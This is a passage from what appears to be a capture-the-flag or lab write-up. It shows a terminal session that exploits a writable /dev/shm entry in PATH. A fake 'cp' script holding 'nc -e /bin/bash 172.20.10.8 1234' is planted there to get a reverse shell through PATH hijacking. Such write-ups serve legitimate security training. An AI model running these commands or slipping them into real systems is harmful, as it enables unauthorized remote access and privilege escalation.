\/var\/www\/html\/index.html<\/code><\/pre>\nPATH=\/usr\/local\/sbin:\/dev\/shm:\/usr\/local\/bin:\/sbin:\/bin:\/usr\/sbin:\/usr\/bin<\/code><\/pre>\nabel@listen:\/tmp$ ls\ncp index.html systemd-private-70889ce703d848a9984da2a35b149e95-systemd-timesyncd.service-Y3Mvyk\nabel@listen:\/tmp$ cat cp\nnc -e \/bin\/bash 172.20.10.8 1234\nabel@listen:\/tmp$ cd \/dev\/shm\nabel@listen:\/dev\/shm$ ls -la\ntotal 0\ndrwxrwxrwt 2 root root 40 May 28 10:22 .\ndrwxr-xr-x 17 root root 3180 May 28 10:22 ..\nabel@listen:\/dev\/shm$ echo 'nc -e \/bin\/bash 172.20.10.8 1234' > cp;chmod +x cp\nabel@listen:\/dev\/shm$ ls -la\ntotal 4\ndrwxrwxrwt 2 root root 60 May 28 11:45 .\ndrwxr-xr-x 17 root root 3180 May 28 10:22 ..\n-rwxr-xr-x 1 abel abel 33 May 28 11:45 cp<\/code><\/pre>\n
![\"image-20240528174739270\"](\"https:\/\/pic-for-be.oss-cn-hangzhou.aliyuncs.com\/img\/202405281748546.png\")
<\/div><\/p>\n